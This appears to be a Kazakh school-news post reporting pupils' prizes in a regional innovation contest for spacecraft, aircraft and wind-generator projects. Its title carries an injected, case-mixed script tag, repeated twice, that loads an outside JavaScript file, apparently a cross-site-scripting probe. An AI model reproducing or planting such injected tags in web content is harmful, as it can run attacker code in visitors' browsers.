«Ұлы өнертапқыштыққа алғашқы қадам»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.05.2019

2019 жылдың сәуір айының 29-30- күндері «Звездый» БСО-нда өткен «Ұлы өнертапқыштыққа алғашқы қадам» инновациялық идеялардың облыстық байқауының үш номинациясы бойынша Біржан сал ауданының оқушылары қатысып, жүлделі орындарға ие болды.
1-номинация - космонавтика және аэрокосмос техникасы саласындағы жобалар: Макин орта мектебінің 10 «Б» сынып оқушысы Шишкин Иван ғарыш кемесінің жобасын жасап, 1-орынға ие болды. Дипломмен, сертификатпен және планшетпен марапатталды.
2-номинация – авиация саласындағы жобалар: Макин орта мектебінің 8 «В» сынып оқушысы Казыбаев Ораз ИЛ-2 әскери ұшағының жобасын жасап, сертификатпен және мадақтамамен марапатталды.
3-номинация – құрылыс саласындағы жобалар – Макин орта мектебінің 9 «Б» сынып оқушысы Брыков Роман желдік генератор жобасын жасап, сертификатпен марапатталды. 
Команда жетекшісі – технология пәнінің мұғалімі Дзирук Владимир Ильич.
 

Просмотров: 675


Пікір қосу



Деректерді қолтаңбаға қосу